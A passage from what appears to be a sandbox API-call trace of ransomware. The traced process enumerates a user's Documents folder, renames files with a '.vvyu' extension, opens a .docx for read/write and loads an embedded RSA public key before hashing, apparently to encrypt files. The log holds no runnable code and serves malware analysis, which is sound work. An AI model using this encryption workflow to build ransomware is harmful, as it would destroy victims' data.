MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\m tTnqTecinKd5iUv7o.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\m ttnqtecinkd5iuv7o.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\m tTnqTecinKd5iUv7o.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\m ttnqtecinkd5iuv7o.ots.vvyu")) returned 1 [0194.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0194.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.010] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.013] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2e95c90 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaef8 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0194.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0194.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0194.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0194.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0194.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0194.017] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0194.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0194.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.018] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0194.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0194.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0194.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0194.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0194.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0194.018] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0194.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb48c8 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ea1a80 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0194.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ea1ad8 [0194.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0194.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0194.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0194.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0194.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0194.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0194.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0194.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0194.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.023] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06c2ab0, ftCreationTime.dwHighDateTime=0x1d89cf7, ftLastAccessTime.dwLowDateTime=0x9560f010, ftLastAccessTime.dwHighDateTime=0x1d8a26e, ftLastWriteTime.dwLowDateTime=0x9560f010, ftLastWriteTime.dwHighDateTime=0x1d8a26e, nFileSizeHigh=0x0, nFileSizeLow=0xbb23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pY_fFtiab_Q4NWHp.docx", cAlternateFileName="PY_FFT~1.DOC")) returned 1 [0194.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0cc0 [0194.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0cc0 | out: hHeap=0x620000) returned 1 [0194.023] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\pY_fFtiab_Q4NWHp.docx") returned=".docx" [0194.023] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\pY_fFtiab_Q4NWHp.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\py_fftiab_q4nwhp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.024] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=47907) returned 1 [0194.024] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.028] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xbafd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.028] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.031] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.031] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xbb23, lpOverlapped=0x0) returned 1 [0194.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.032] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.032] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.033] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.033] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.033] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.033] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.033] GetLastError () returned 0x0 [0194.033] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.033] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.034] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.034] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.034] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbb20) returned 0x2ea79b0 [0194.034] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0cc0 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0d08 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.035] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2a68 [0194.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0194.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657210 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.037] GetCurrentThreadId () returned 0x66c [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f9b0 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.038] GetCurrentThreadId () returned 0x66c [0194.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a98 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.040] 